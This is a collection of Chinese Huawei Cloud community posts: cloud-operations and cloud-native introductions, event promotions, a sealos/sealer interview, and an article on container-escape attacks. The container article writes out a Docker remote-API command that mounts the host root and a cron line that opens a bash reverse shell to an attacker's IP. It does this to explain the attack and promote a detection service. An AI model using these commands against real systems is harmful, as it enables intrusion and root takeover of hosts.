>摘要：随着云原生2.0时代的来临，越来越多的企业及个人选择使用云原生技术来构建业务，云原生技术给业务构建、交付带了便利的同时，对运维也提出了更高的要求。本文分享自华为云社区《云原生2.0时代，华为云DevOps立体运维实践》，原文作者：灰灰哒 。 2020年12月，中国DevOps社区峰会在北京举办。DevOps大咖齐聚一堂，其中华为公有云应用运维域产品经理闫硕受邀分享《华为云DevOps立体运维实践》。 华为云作为云原生技术的先行者与普及者，一直致力于云原生产业的推动与发展。在华为云提出的云原生2.0全景图中，应用敏捷助力企业以应用为中心，上云更高效，创新更敏捷。其中，高效运维则是重要保障。 随着云原生2.0时代的来临，越来越多的企业及个人选择使用云原生技术来构建业务，云原生技术给业务构建、交付带了便利的同时，对运维也提出了更高的要求。  传统运维到云原生2.0场景运维有诸多区别，传统运维在基础资源方面工作量较大，需要自行构建运维系统，同时又难以进行基础设施维度的弹性扩容。而在云原生2.0场景下，基础资源运维大多由云厂商提供，所以用户可以有更多的精力来关注业务本身的运维，与此同时云厂商会提供更加通用、普适的运维产品，降低用户的运维工具构建成本。相比与传统运维，云原生2.0场景下的运维更加的弹性、敏捷，可以针对虚机资源、应用进行弹性扩缩容，以此来应对业务的高峰与低谷。 # 那么在云原生2.0场景下运维要求又有哪些？ 首先，需要有一套高效的运维流程，依托标准的运维规范来完成日常的各种运维动作；其次运维工具也是必不可少的，需要有一套以应用为中心，并且能够具备可视化展示各种维度监控指标的监控平台；日志功能也是运维过程中必不可少的工具，通过日志收集、存储、分析等过程，展示各种日志文件分析后的数据，作为日常运维的重要依据；最后，链路拓扑也是自动化运维的重要功能点，由于应用下属的实例个数众多，需要可视化展示每个微服务实例之间的调用关系，出现问题时，下钻到微服务内部进行方法级别的故障诊断。  华为云立体运维解决方案是为云上客户量身定制的一个解决方案，包含AOM（应用运维管理服务）、APM（应用性能管理服务）、LTS（日志服务）。覆盖IaaS层的基础设施状态，Paas层的中间件及数据库状态，应用层的各类应用状态及指标这三层，形成立体化运维分析能力。华为云立体化运维解决方案遵循DevOps标准，可以敏捷高效的获取云上应用的各类异常，并辅助运维人员快速定位。同时立体化运维解决方案以应用为中心，展示应用指标、拓扑、状态信息，提供应用视角的监控运维模式，满足日常巡检、故障排查等多种运维场景。  # 华为云立体运维解决方案具有以下特点：  ## 1 统一运维监控管理：资源、应用、业务一站式监控与分析 支持集群、虚机、网络、磁盘、数据库、应用、容器及业务等上百种监控指标与秒级监控，通过集群与虚机、虚机与应用、应用与资源统一建模，对各种指标智能关联分析，用户通过统一的告警入口和下钻找到问题根因。 ## 2 日志分析：分布式日志集中搜索与实时查看 将虚机上的应用、开源组件、系统等日志集中采集到数据库，用户通过日志管理快速找到应用实例日志，提供实时刷新、日志上下文查看、秒级搜索、日志下载等常用功能。  ## 3 应用拓扑分析：应用关系与异常一目了然、故障下钻 对应用健康状态可视化管理，包括应用运行状态、时延、错误、负载、依赖关系，包括数据库、缓存、消息中间件、NOSQL等各类开源组件。 华为云立体运维解决方案致力于打造全方位的云上整体运维方案，将云原生2.0运维的优秀实践以云服务的方式提供给外部客户，帮助客户应对云原生2.0场景下的各种运维难题。全面覆盖基础设施层、应用层、数据库或中间件等多维度监控指标，用户无需自建各种复杂的运维系统，也可即刻使用开箱即用的运维功能。 点击即刻体验立体运维 https://www.huaweicloud.com/product/aom.html

如果满分10分，您对本次云原生入门级开发者认证人才计划活动打多少分？如果让你来策划，你会设置怎么样的学习任务？配套什么奖品？如果下一期再组织类似活动，您最期待是什么主题的？来吧，填一下满意度调查问卷，你的宝贵建议和意见，将在下一期活动得到改善！而且，填完问卷，还可以抽奖，奖品有：云原生干货内容大礼包、折叠帆布包、价值200元的6折认证考试券。https://devcloud.huaweicloud.com/expertmobile/qtn?id=5f49ae4cea4c4dbdb8e74d85c6401c03 

>摘要：云原生2.0时代，任何企业都可以成为“新云原生企业”，作为云原生的代表技术之一的容器，每个企业都应该对容器安全有所了解。本文分享自华为云社区《[云原生2.0时代：企业更应了解一下容器安全](https://huaweicloud.blog.csdn.net/article/details/114066177)》，原文作者：华为助力企业上云。 随着云原生技术的成熟和市场需求的升级，云计算的发展已步入新的阶段，云原生2.0时代已经到来。从技术角度看，以容器、微服务以及动态编排为代表的云原生技术蓬勃发展，成为赋能业务创新的重要推动力，并已经应用到企业核心业务。从市场角度看，云原生技术已在金融、制造、互联网等多个行业得到广泛验证，支持的业务场景也愈加丰富，行业生态日渐繁荣。云原生2.0是企业智能升级的新阶段，企业云化从“ON Cloud”走向“IN Cloud”，新生能力与既有能力有机协同、立而不破，实现资源高效、应用敏捷、业务智能、安全可信，成为“新云原生企业”。 云原生2.0时代，任何企业都可以成为“新云原生企业”，作为云原生的代表技术之一的容器，每个企业都应该对容器安全有所了解。 传统的虚拟机能够基于虚拟化技术更加有效的利用硬件计算资源，可以实现云租户的隔离与资源共享。相比虚拟机来说，容器更轻、更快，但是作为一种新技术，容器的安全防护也与虚拟机所有不同。 # 容器 VS 虚拟机 容器与虚拟机具有相似的资源隔离和分配价值，但容器的作用不同，因为容器是虚拟化操作系统而不是硬件。容器更便携，更高效。  容器VS虚拟机 虚拟机（VM）是对物理硬件的抽象，将一台服务器转化为多台服务器。Hypervisor允许在一台机器上运行多个虚拟机。每个虚拟机都包含操作系统、应用程序、必要的二进制文件和库的完整副本，占用数十GB的空间。虚拟机启动速度也比较慢。 容器是应用程序层的一个抽象，将代码和依赖打包在一起。多个容器可以运行在同一台机器上，与其他容器共享操作系统内核，每个容器在用户空间中作为隔离的进程运行。容器比虚拟机占用更少的空间（容器镜像通常只有几十MB大小），可以处理更多的应用程序。 # 容器逃逸  容器逃逸，是容器技术启用以来一直被关注的问题，甚至被认为是容器的首要安全问题。所谓“逃逸”，指的是“流氓”容器/虚拟机尝试突破隔离环境的限制，访问宿主系统或者在同一个系统上的同驻容器或虚拟机。从而造成敏感信息泄露，或者系统及服务发生DOS的行为。  但正是由于容器与宿主系统共享内核，因此容器与宿主机有着更大的接触面，隔离层次更少，更容易从容器内实施逃逸攻击。因此，如何解决容器逃逸安全风险，避免容器逃逸攻击带来的损失是容器安全中最为重要的一个问题。 # 容器逃逸常用手段 ## （1）通过容器自身漏洞及内核漏洞逃逸  攻击的主要途径之一就是利用漏洞，通过程序设计或实现的缺陷来执行非法操作，容器逃逸也不例外。容器自身漏洞是其利用进行逃逸的路径之一，同时由于容器共享宿主系统内核，因此内核漏洞是其逃逸的另一路径，同时由于内核漏洞的数量远远大于容器自身漏洞，因此内核漏洞甚至成为容器逃逸更为主要的一个手段。 **1）利用容器漏洞逃逸 – shocker攻击** Shocker攻击是容器逃逸最著名的案例，其本质是利用了一个不常用的系统调用open_by_handle_at，同时借助docker1.0前版本并未限制CAP_DAC_READ_SEARCH能力，并将容器启动时会挂载宿主机文件到容器内（如旧版本的/.dockerinit，新版本的/etc/hosts）作为起点，执行暴力破解攻击，最终获取到要访问的宿主系统文件的句柄信息并进行读取，从而实现逃逸。 Github地址：https://github.com/gabrtv/shocker 容器执行shocker攻击逃逸访问宿主系统/etc/shadow文件：  2）内核漏洞利用逃逸 – dirtycow攻击  DirtyCow（脏牛漏洞，CVE-2016-5195）是Linux内核中的一个权限提升漏洞，其也可被容器利用实施逃逸。容器利用dirtycow漏洞改写虚拟动态共享库VDSO（Virtual Dynamically Shared Objec），并将shellcode置入其中，当主机系统进程调用并执行修改后的内容时，就会借用此进程身份执行置入的shellcode，并最终在容器内获得一个来自主机的root权限的shell。  ## （2）不安全配置引发逃逸 **1）不安全启动，如privileged特权容器** 容器以--privileged参数启动时称为特权容器，特权容器顾名思义具有较高权限，包括对宿主机上的设备的访问权限。因此，攻击者可以直接在容器内mount主机设备并进行文件访问，从而轻而易举实现逃逸。   **2）不安全挂载，如挂载docker.sock到容器**  图片来源：https://medium.com/better-programming/about-var-run-docker-sock-3bfd276e12fd Docker.sock文件是一个Unix domain socket文件，是Docker daemon默认监听的套接字文件，docker client通过它与docker daemon进行通信。docker client将信息查询和下发命令等请求通过docker.sock发给docker daemon，然后由deamon执行具体请求，包括镜像查询、容器创建等。 将docker.sock挂载到容器内，可以在容器内继续运行一个容器，实现docker in docker，并可在容器内容器启动时通过-v参数将宿主机根目录挂载到容器内，从而在容器内访问宿主机文件，实现逃逸。  **3）Docker remote api未授权访问** 默认情况下，docker daemon只允许通过unix domain socket – docker.sock进行本地通信操作，但除此之外，docker daemon也提供了Restful API供远端client访问（daemon通过-H参数指定监听端口），如果未对访问进行权限控制及合规性检查，则攻击者也可以访问这个API执行高危操作，并实施逃逸攻击。 例如一种攻击场景： - 通过Remote API创建一个容器，并将宿主系统根目录挂载到容器内： `# docker -H tcp://$IP:$PORT run -it -v /:/mnt ubuntu /bin/bash` 其中：$IP表示docker daemon服务ip，$PORT表示Remote API监听端口 - 将反弹shell命令写入计划任务文件 `# echo '* * * * * /bin/bash -i >& /dev/tcp/$IP/$PORT 0>&1' >> /mnt/var/spool/cron/crontabs/root` 其中：$IP表示攻击端IP，$PROT表示攻击端监听端口 - 攻击端监听上一步中的$PORT端口，获取来自对端（docker服务所在系统）的具有root权限得反弹shell，并任意访问。 # 华为云容器安全服务CGS之逃逸安全防护方案  # 华为云容器安全服务CGS 华为云容器安全服务CGS构建了容器安全威胁纵深防御体系，提供包括镜像扫描、威胁检测与威胁防护的一整套容器安全能力，提供针对容器的Build、Ship、Run全生命周期保护能力，渗透到整个容器DevOps流程，保证容器虚拟环境从开发到生产整个流程的安全。其中，容器逃逸检测是CGS的核心功能之一，它通过如下手段构建系统化的容器逃逸全面防护能力： ## （1）监控容器不安全配置启动 前文中提到，不安全配置是容器逃逸的一个重要原因。因此，监控容器的不安全启动也是容器逃逸防护的一个重要手段。CGS可以针对容器启动的各种不安全配置进行监控，包括启动特权容器、挂载宿主机文件、安全策略关闭、特权端口映射等，从容器创建伊始就检测逃逸风险，实现整体防护方案第一步。 ## （2）容器行为深度分析 容器启动后，CGS可对容器运行过程中的行为进行实时跟踪和观察，监控容器内的进程运行、文件访问、网络连接、系统调用等行为，并对行为进行深度分析，从行为过程体现出来的特征到行为所产生的结果进行全面分析检测，有效发现容器已知和未知漏洞利用逃逸攻击行为并进行告警。  ## （3）容器基线机器学习 一般而言，容器的行为通常固定且纯粹，比如一个提供web服务的容器内可能只会运行一个nginx进程，一个提供DB服务的容器内可能只会运行一个mysql进程，并且进程所执行的操作，包括文件访问、系统调用、网络连接等行为都有固定合理范围，因此可以对容器圈定正常行为范围，构建行为基线。CGS利用机器学习技术，从静态和动态两个维度分析容器正常行为并建立基线，使得基线模型更准确、更完整，然后根据基线跟踪容器行为，感知基线以外的异常行为，实现对攻击行为的全面感知，并有效提升对于容器利用0day漏洞进行逃逸攻击的检测能力。  华为云CGS容器逃逸方案防护机制内置在防护平台，无需用户参与即可实现容器逃逸系统化检测，具有良好的易用性，同时方案采用事件驱动机制实现性能高、反应快，为容器安全保驾护航。

华为云云原生入门级开发者认证（HCCDA - Cloud Native ）人才计划_云原生_认证_k8s_云容器_云计算培训-华为云 https://edu.huaweicloud.com/activity/HCCDA-CloudNative.html   

今天晚上19:00，咱直播间不见不散华为云大咖带你玩转云原生DevSecOps华为云云原生入门级开发者认证人才计划系列直播收官之秀，丰富好礼等你来拿！更多认证干货内容，精彩资讯，将在直播间发布，错过了以前的，今晚不容再错过快戳链接报名吧！https://edu.huaweicloud.com/signup/521bd9a32c9345d5b240d4173e67437a直播间观看链接：https://bbs.huaweicloud.com/live/edu_live/202204011900.html

【活动时间】2022/3/30—6/30【活动主题】数据库专场，“预见”华为伙伴暨开发者大会2022！【活动内容】话题互动+开发者故事征集+活动分享//*3个活动内容盖楼独立活动一：话题互动 —— 回帖盖楼话题方向话题内容 话题1：#华为伙伴暨开发者大会2022“预见”数据库#你参加过华为伙伴暨开发者大会（往年的HDC大会）线下活动吗？华为伙伴暨开发者大会2022数据库版块，你最关注/最想了解什么内容？华为伙伴暨开发者大会2022，数据库我想对你说？数据库行业百花齐放，GaussDB作为华为倾力打造的自研数据库，你看好它的发展吗？对于华为云GaussDB数据库有什么好的建议呢？话题2：#与GaussDB挑战赛的不解之缘#你参加过2019-2021历届的数据库挑战赛吗？数据库挑战赛给你留下最深的印象是什么？你的参赛经历/经验是否可以分享下？你希望数据库挑战赛的赛题方向是什么？参与方式：选择其中一个话题即可，进行回帖盖楼回复格式：华为云账号+话题X+具体内容（不少于30字）奖励规则：盖楼层数X中奖用户数奖品名称XX/10 1.公牛插座/三合一数据线/GaussDB字母笔/雨伞/定制水杯（随机发）X≥80X/10+1 2. 基于1奖品，随机赠送价值50元“64G U盘”一个X≥150X/10+1 3.基于2奖品，随机赠送价值99元“荣耀智能体脂称2”一个X≥230X/10+1 4. 基于3奖品，随机赠送价值129元“折叠烧水壶” 一个X≥300X/10+1 5. 基于4奖品，随机赠送价值199元“HUAWEI （灰色）背包” 一个活动二：开发者故事征集——说出你的故事参与前情：如果参加过华为伙伴暨开发者大会2022（往年HDC）数据库线下大会，请谈谈参会感受、对华为伙伴暨开发者大会的未来期望或者与相关的内容；如果参加过往届的华为云数据库挑战赛，可以谈谈参赛感受和经历，分享参赛过程中的故事。如果以上都未参加过，可以分享一下你与数据库的前世今生，比如参加过数据库往期的哪些线上/线下活动，参与活动的收获、成长或具体感受，可自行拓展。参与方式：请先添加华为云数据库小助手（18209232786），回复：“华为伙伴暨开发者大会预热——开发者故事征集”关键词即可（视频制作前，请先说明一下录制的内容，小助手可以帮忙把把关，避免跑题或者词不达意）录制要求：画质清晰，话题内容贴合要求，录制时组织好语言，视频时长3分钟左右；有拍摄经验者可拍摄出类似于Vlog形式的视频更加分哦！奖励规则： 奖励标准奖品名称数量视频内容最优质的前20名 华为背包（灰色）1 折叠烧水壶2 智能体脂称23 64GU盘+商务笔记本6 《华为数据之道》书籍/《数据库原理与应用》书籍8后20名 GaussDB字母笔不限 活动三：呼朋引伴来参与参与方式：Step1：分享活动海报，邀请好友参与活动Step2：好友完成“活动一 / 活动二”中任意一个任务，参与回帖即可回复格式：华为云账号+邀请者华为云账号+活动一/活动二内容打卡奖励规则：相互填写对方的华为云账户不算邀请哦！有效邀请人数N奖品N≥5笔夹/3D立体卡通书签/三合一数据线X≥10雨伞/手机支架X≥1564G U盘 + 定制水杯/GaussDB字母笔X≥20《华为数据之道》书籍/《数据库原理与应用》书籍，三选一X≥30荣耀智能体脂称2【注意事项】1.获奖结果将在活动结束后7个工作日内进行公示，请报名和留言的伙伴关注社区内容，所有奖品将在活动结束后15个工作日内发放。2.活动奖品颜色随机，且部分奖品数量有限发完将用等值奖品代替；3.为保证活动的公平公正，华为云有权对恶意刷活动资源（“恶意”是指为获取资源而异常注册账号等**活动公平性的行为），利用资源从事违法违规行为的用户收回抽奖及奖励资格。4.本活动最终解释权归华为云所有。

应该没有问题，此贴删除

面向高校学生、个人开发者、企业开发及运维人员，华为云即将推出云原生入门级开发者认证（HCCDA - Cloud Native），从开源组件到华为云上服务的介绍，使您掌握云原生的核心理念和架构，具备基本开发实践能力。为帮助开发者学习并顺利通过认证，华为云开发者学堂上线“云原生入门级开发者认证人才计划”赋能学习活动，收获知识干货、拿到官方证书的同时还有机会赢取更多精美奖品！快来报名吧！https://edu.huaweicloud.com/activity/HCCDA-CloudNative.html

点击立即进入活动专场#华为云开年采购季应用魔方APPCube首购19.8元限时包月6折，包年5折高效易用的低代码aPaaS平台，轻松构建专业级应用下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF #华为云开年采购季华为云区块链引擎首月体验19.8元限时包月6折，包年5折帮助政企高效的搭建区块链应用，可信、高效下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF#华为云开年采购季一站式DevOps平台低至1.98元源自华为近30年研发实践经验，支持20+主流变成语言下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF#华为云开年采购季Kafka 消息服务体验版首购30元采购季包月6折，包年5折满足企业类应用、物联网应用亿级消息吞吐下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF#华为云开年采购季Redis缓存服务首购19.8元采购季包月6折，包年5折应用读写性能加速，互联网应用必备下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF#华为云开年采购季应用管理与运维平台ServiceStage首购19.8元领万元开年礼包，低至5.8折一站式PaaS平台，适用于微服务和通用应用下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF#华为云开年采购季漏洞扫描服务，云内外一键全网扫描限时包月8折，包年6.7折起支持Web网站、主机、弱密码、内容合规检测下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF#华为云开年采购季移动应用安全，APP首次检测9.9元限时包年8折，支持APP漏洞安全、隐私合规适用于App发布前安全合规自测，或通报后自查下单抽FreeBuds耳机，100%赢好礼速戳→http://t.cn/A664xQhF云原生2.0时代来临应用现代化，助力企业降本增效华为云开年采购季，多款云原生服务热卖中！多款中间件、DevSecOps服务低至1.98元！下单即可抽取FreeBuds等好礼，100%有奖！速戳→http://t.cn/A664xQhF

云链合一，我的开源之路作者：fanux.中弈.方海涛 sealos作者，sealer发起人2022年2月24日，方海涛，阿里云原生技术专家在“2022云原生超级英雄会”直播中分享了他的两个开源项目sealos和sealer。sealos诞生及商业化sealos诞生的过程是很有趣的。K8s 早期版本时，官网上找不到可用度高的安装工具,即便是官方也没有给出高可用相关的文档，此时我写了一个可用度较高的安装脚本放在阿里云市场上，有很多人下载，需求非常旺盛。但是此脚本也存在很多问题，基本每个用户使用都会遇到bug,以至于我在电影院看电影的时候都需要支持解决问题。于是为了让体验更好我写了第二个版本——ansible版诞生了。但ansible只是使用起来方便许多，并没有解决根本的安装复杂问题，比如对于很多用户安装ansible本身都不成功，特别是在离线的环境中更容易出错，就又需要把ansible放到docker中，这样俄罗丝大娃套小娃。为了解决这个问题，我思考了很长时间，最后在kubeproxy源码上找到了灵感，发现负载均衡器的实现方式可以来借用一下，去掉很重的组件，使整个脚本变得简单。于是第三个版本用golang解决了以往的问题。把事情做到简单极致，一条命令解决一切。sealos已经诞生三年，即便在今天依然非常先进，这也是sealos有竞争力的地方。sealos从诞生之日起就是商业化的，最早的脚本便放在市场上进行售卖了，在云市场上架的人工审核时间要一周的时间，需要人为催促或者手动上传，整个过程非常消耗精力和时间。为了解决这个问题，社区写了一个网站售卖sealos，机器人通过网站的API将sealos安装包传到云市场，保持最快的更新速度。整个过程全部由机器人自动构建、自动测试、自动上架。早期的时候我几乎每天写代码写到夜里12点左右，下半夜开始在云市场上找客户拿到他们的联系方式，与他们联络，积累了一些种子客户。后续的发展主要通过一些技术博客引流，目前已经到了用户口碑传播的阶段，真正进入了爆发期，甚至有一段时间短短两周的增长超过之前两年总和，所以把作品做到极致是实现爆发增长的必要因素，在产品还不够极致时去推广很多时候适得其反。从sealos到sealer为什么sealos出现了爆发性增长，还要再开发sealer呢？因为sealos是单纯地为K8s构建的，但是用户的需求非常复杂，所以需要sealer来解决这些各不相同的问题。比如客户需要的组件并不相同，比如集群中组件的配置如何管理，如何很方便的让用户定制自己需要的安装包等。sealer参考吸收了Docker的设计思想，它将整个集群以及所有依赖做成镜像，将用户的中间件、数据库、SAAS等组合成集群镜像，最后一键运行整个集群。sealer诞生的几个月后便在两三家客户的生产环节落地了，大概一年的时间增长到40余家。当时需求十分旺盛，sealer可以解决专有云交付、自定义集群等问题。无论是在云上、云下或者专有云，使用sealer进行交付都是很便捷的方式。Sealer更是特别重视使用体验而不是一味的堆功能，针对很多需求我们并不满足于只是实现需求，而是会思考实现的方案是否优雅，是否会给不用这块功能的人带来困扰，我们寻求的是全局最优解而不是局部某个客户的最优解，所以在sealer从Kubefile到Clusterfile到配置管理插件等设计都能看到在追求极致，多一分则嫌多，少一分则嫌少，通过大道至简的高度抽象满足各种奇葩复杂的需求，极大的降低了整个云原生领域生态软件的落地和交付门槛。云链合一的未来从应用的视角观察会发现应用的开发者关心的是业务逻辑而不是底层的问题，对于应用开发者而言应当让他们不用关心底层复杂应用的基础设施，弹性伸缩以及监控流程等问题。所以 serverless faas 低代码等会成为一个趋势，现在很多比较敏感的公司都采用这些技术，节省开发成本和基础设施费用，它确实不用消耗很多资源，按需扩容和按需弹性各方面都会非常好，在开发时不用写很复杂逻辑，最简程度解决问题。有意思的是区块链合约的发展，最早的比特币脚本开始的，早期的比特币脚本比较单一，只能进行简单的操作，就是处理出栈入栈操作，不是图灵完备。向后发展以太坊合约可以跑在EVM上，你会发现EVM就是个容器，solidity语言就是用来写合约，此时合约与faas已经非常像了。再往后发展，可以看到今天的一些公链很多以wasm作为合约，如polkadot 的ink!，通用性大大提高，你甚至可以用任意语言来写合约。结合云原生领域的发展可以看到大家似乎在往一个方向发展。合约本质上与faas十分相似，FaaS对应几个函数接口，合约也是同样，可以使用前端js调用合约或者function。js相当于前端，合约相当于后台，写合约的人不用去关心服务器的存在，只需要关心是否运行。两个地方朝着一个方向发展，开发者不用再关心后端很复杂的基础设施了。在未来，会有一个强大的云操作系统使世界级计算机运行起来，所有的业务都可以基于计算机上的云计算体系产生颠覆效应。这也会是我未来发展的主要方向。开源历程中的感悟我自己的感悟主要有几点：第一，静心学习，巧妇难为无米之炊，很多想法并不是凭空诞生的，多沉淀知识，才能够有想法，将想法组合组装，一些灵感就会诞生。多去了解市场行情，听听用户的想法，发现用户的痛点，结合自己的想法付诸实践，解决用户的问题。不要急躁，专心打造优雅的作品然后很自豪的去分享你的作品。第二，持续的写代码，对于开发者来说这是根本。不要担心写代码没出路，没出路一定是代码写的不够好，国外已经有很多码农写出百亿美金的公司了，随着时代发展国内也会出现很多这样的例子，管理并非我们的唯一出路。第三，若是通过开源运营一家公司，有三要素，1. 要了解市场时空，有足够的市场空间和好的时机。2.根本灵魂在于好作品，以产品为驱动，我自己会花80%以上精力在产品上。3. 合理运营，让用户知道你的好东西，并形成口碑传播。 以前我认为商业模式也应当是要素之一，后来我觉得这不重要，解决了用户痛点有就可以有100种商业模式。以上是我关于开源项目sealos与sealer的全部分享。云原生是应用开发的大变革，在开发者的共同努力下，会挖掘出更多有意义的开源项目促进云往简单开放的方向发展。原文链接：https://blog.csdn.net/github_35614077/article/details/123643611

近日，华为云GaussDB重磅推出了《华为云数据库GaussDB》专刊。在这里，我们将为您剖析数据库最前沿技术及方向，解读GaussDB全套解决方案，跨越数字化实践应用鸿沟，为千行百业持续提供稳定高效智能的数据服务。五大板块，全方位为您提供更丰富的数据库内容：产业观点：洞悉数据库前沿发展趋势，掌握数据库最新方向解决方案：全套GaussDB数据库迁移解决方案，让客户安心、省心、放心客户实践：成功在1500+大型客户规模商用，助力千行百业数字化转型开放生态：产学研用，汇聚创新力量，助推数据库产业生态发展最新动态：新品上市、产业动态、行业资讯、开发者活动等重大内容抢先知我们相信，未来一定会有越来越多的企业基于云数据库来构建更稳定可靠的数据底座服务，企业数字化进程也会在云数据库的助力下变得更快、更稳。想了解更多《华为云数据库GaussDB》专刊内容，欢迎点击下方【附件】下载哦！

《数据库原理▪GaussDB云数据库》MOOC第3季 春日携礼归来【活动时间】2022年3月15日 - 7月15日【活动主题】《数据库原理▪GaussDB云数据库》MOOC—第3季 春日携礼归来，MOOC免费学， 分享得更多【活动内容】 活动一： MOOC免费学Step1：点击报名：《数据库原理•GaussDB云数据库》MOOCStep2：报名完成后，将MOOC报名学习页面截图，盖楼打卡即可Tips：每个ID抢楼不得连续超过3楼，总楼层数不得超过10楼盖楼内容：华为云账号+MOOC报名学习截图；活动二：分享得更多转发下方活动海报至朋友圈，+转发语：《数据库原理▪GaussDB云数据库》MOOC—第3季 春日携礼归来：课程由8位博导团队+华为云数据库技术专家共同打造，免费学习还有好礼哦，可别错过啦！公开可见保持2小时以上，将转发内容的朋友圈截图回复至下方评论区！Tips：一定要公开可见保持2小时哦~【中奖规则】踩中幸运中奖楼层【奖励】活动1【奖励】活动2【盖楼超50层】楼层5%、15%、25%、35%、45%、55%、65%、75%、85%、95%500码豆/人1000码豆/人楼层8%、38%、68%、88%雨伞/高硼玻璃杯/GaussDB字母笔价值69元的书籍《数据库原理及应用》 其他活动开年采购季，8000元见面礼+0门槛抽奖，云数据库包年18元起！【参与有奖】GaussDB(for MySQL) 关键特性发布和技术解读什么是码豆？会员中心入口：https://devcloud.huaweicloud.com/bonususer/home码豆奖励活动规则：1）码豆可在码豆会员中心兑换实物礼品。2）码豆只能用于会员中心的礼品兑换，不得转让，具体规则请到会员中心阅读“码豆规则”。3）为保证码豆成功发放，如果修改过账号名还请向工作人员提供修改前后的账号名。  活动规则 1）请务必使用个人账号参与活动（IAM、企业账号等账号参与无效）。2）所有获得华为奖项的获奖用户，请于获奖后3日内完成实名认证，否则视为放弃奖励。3）本次活动如一个实名认证对应多个账号，只有一个账号可领取奖励；一个实名认证账号只能对应一个收件人，如同一账号填写多个不同收件人或不同账号填写同一收件人，均不予发放奖励。4）活动结束且用户填写完成领奖信息后，15个工作日内发放奖品，发放时间根据实际情况动态调整，如有延期敬请见谅。5）本活动最终解释权归华为云所有。

  **云原生的主旨是构建运行在云端的应用程序，致力于使应用程序能够最大限度地利用云计算技术特性的优势，提供更加优质的应用服务**。   云原生也是一种构建和运行应用程序的方法，它充分利用了云计算的优势，重点关注如何在云计算交付模式下创建和部署应用程序。云原生应用适用于公共云和私有云，开发人员可以充分利用当前云计算平台上的资源来构建应用，采用适用于云计算环境下的开发方法进行软件开发。通过云原生的方式构建和运行应用程序，使企业更敏捷地进行创新，以更快速地向市场推广产品和服务，做到更快速地响应客户需求。   云原生与传统云计算最大的区别在于，**传统云计算关注的是如何提供性价比最高的计算、存储、网络资源，而云原生关注的是如何让产品能够支持快速验证业务模式，如何简化复杂的开发流程、提升研发效率，如何保障产品的高可用性让业务无须承受成长之痛，如何实现大规模弹性伸缩轻松应对业务爆发等**。 ## 云原生的内容   云原生是面向“云”设计的应用，因此技术部分依赖于传统云计算的三层概念，即基础设施即服务（IaaS）、平台即服务（PaaS）和软件即服务（SaaS）。应用基于云服务进行架构设计，除了对业务场景的考虑外，对隔离故障、容错、自动恢复等非功能需求会考虑更多。借助云服务提供的能力也能实现更优雅的设计，例如弹性资源的需求、跨机房的高可用、11个9（99.999999999%）的数据可靠性等特性，基本是云计算服务本身就提供的能力，开发者直接选择对应的服务即可，一般不需要过多考虑本身机房的问题。如图所示，目前业界公认的云原生主要包括以下几个层面的内容。    1. 敏捷基础设施   基于云计算的开发模式要考虑如何保证基础资源的提供能够根据代码自动实现需求，并记录变更，保证环境的一致性。使用软件工程中的原则、实践和工具来提供基础资源的生命周期管理，意味着工作人员可以更频繁地构建更强可控或更稳定的基础设施，开发人员可以随时使用一套基础设施来服务于开发、测试、联调和灰度上线等需求。当然，同时要求业务开发具有较好的架构设计，不需要依赖本地数据进行持久化，所有的资源都可以随时拉起、随时释放，同时以 API的方式提供弹性、按需的计算和存储能力。   技术人员部署服务器、管理服务器模板、更新服务器和定义基础设施的模式都是通过代码来完成的，并且是自动化的，不能通过手工安装或克隆的方式来管理服务器资源。运维人员和开发人员一起以资源配置的应用代码为中心，而不再是一台台机器。基础设施通过代码来更改、测试，在每次变更后执行测试的自动化流程中，确保能维持稳定的基础设施服务。 2. 持续交付   持续交付是一系列的开发实践方法，分为持续集成、持续部署、持续发布等阶段，用来确保从需求的提出到设计开发和测试，再到让代码快速、安全地部署到产品环境中。 - **持续集成**：是指开发人员每提交一次改动，就立刻进行构建和自动化测试，确保业务应用和服务能符合预期，从而可以确定新代码和原有代码能否正确地集成在一起。 - **持续交付**：是指软件发布的能力，在持续集成完成之后，能够提供到预发布之类的系统上，达到生产环境的条件。 - **持续部署**：是指使用完全的自动化过程来把每个变更自动提交到测试环境中，然后将应用安全地部署到产品环境中，打通开发、测试、生产的各个环节，自动持续、增量地交付产品，也是大量产品追求的最终目标，当然，在实际运行的过程中，有些产品还会增加灰度发布等环境。 总之，持续交付更多的是代表一种软件交付的能力，过程示例如图所示。    3. DevOps   DevOps从字面上理解只是Dev（开发人员）+ Ops（运维人员），实际上它是一组过程、方法与系统的统称。 （1）组织架构、企业文化与理念等，需要自上而下设计，用于促进开发部门、运维部门和质量保障部门之间的沟通、协作与整合。简单而言，组织形式类似于系统分层设计。 （2）自动化是指所有的操作都不需要人工参与，全部依赖系统自动完成，例如上述的持续交付过程必须实现自动化才有可能完成快速迭代。 （3）DevOps的出现是由于软件行业日益清晰地认识到，为了按时交付软件产品和服务，开发部门和运维部门必须紧密合作。   总之，DevOps强调的是高效组织团队之间如何通过自动化的工具协作和沟通来完成软件的生命周期管理，从而更快、更频繁地交付更稳定的软件，如图所示。    4. 微服务 传统业务架构面临的一些问题： ① 单体架构在需求越来越多的时候无法满足其变更要求，开发人员对大量代码的变更会越来越困难，同时也无法很好地评估风险，所以迭代速度慢。 ② 系统经常会因为某处业务瓶颈导致整个业务瘫痪，架构无法扩展，木桶效应严重，无法满足业务的可用性要求。 ③ 整体组织效率低下，无法很好地利用资源，存在大量的浪费。 微服务的优势： ①微服务是一种架构风格，也是一种服务； ②微服务的颗粒比较小，一个大型复杂软件应用由多个微服务组成， ③它采用 UNIX 的设计哲学——每种服务只做一件事，是一种松耦合的、能够被独立开发和部署的无状态化服务（独立扩展、升级和可替换）。      一个微服务基本是一个能独立发布的应用服务，因此可以作为独立组件升级、灰度或复用等，对整个大应用的影响也较小。每个服务可以由专门的组织来单独完成，依赖方只要定好输入和输出口即可完全开发，甚至整个团队的组织架构也会更精简，因此沟通成本低、效率高。   根据业务的需求，不同的服务可以根据业务特性进行不同的技术选型，是计算密集型还是I/O密集型应用都可以依赖不同的语言编程模型，各团队可以根据本身的特色独自运作。服务在压力较大时，也可以有更多容错或限流服务。 ## 云原生应用的技术手段   